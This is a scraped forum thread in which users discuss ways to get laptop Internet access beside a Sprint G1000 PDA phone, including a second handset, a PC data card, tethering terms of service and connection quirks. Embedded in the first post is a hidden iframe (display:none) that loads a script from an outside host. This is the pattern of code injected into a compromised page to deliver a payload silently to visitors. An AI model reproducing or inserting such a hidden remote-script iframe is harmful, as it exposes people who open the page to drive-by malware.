Companion Phone

I just got the Sprint G1000 PDA phone and really like it. However, I need a second regular Sprint phone that my laptop can use for Internet access.

I can't talk on the G1000 and use data at the same time, so I need a primary data unit.

Old or new, I don't care, I just need a good data capable Sprint phone.

Any suggestions will be welcome.

BTW - Not interested in the PC cards.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Its been mentioned several times that the use of a "Vision" capable device for use to connect a laptop to the internet is against TOS and could get you a call from sprint where you would have to chose to forgoe the "unlimited Vision pack" and pay the default rate, or promise to stop useing it as a laptop modem (I can personaly testify that this is and will continue happeneing). On the other hand any of the older 2G (14.4Kbps max) phones (Vision is 3G) are usable as a laptop modem w/o violating the TOS because they use minutes and are not unlimited. I would highly recomend a PC card and (if you are a business customer) the $80 unlimited data plan for data cards.

Now that that is all done..... Are you looking for a 2G or 3G and what size do you prefer?

Errrr

Thanks for sharing. I did not know that.

I guess I should move to Japan and go with 4G

Hmmm, unlimited at 80 bucks. I would consider that if it works better than the data on the G1000. For each web page request it connects, then disconnects right away. It spends more time establishing connections than actually download pages.

Does the PC card have the same connection behavior?

rust, if you want a constan connection on the G, then go to your connection tab and manually conect to vision, it will stay conected until you manually disconnect it.

the air card from sprint is my backup. i have had it for over a year and it does pay for itself...

I have to agree that the Aircard seems like a better option than buying another phone. If you do that, you will lose the benefit of the integrated pdaPhone while using the other phone... and have a second number to deal with.

That's Beautiful

I'm fighting back a tear in my eye.

Now, if I can hook a keyboard and monitor to the G I'm set!

All...choked...up...lump....in...throat...hugging G1000..in fetal position...
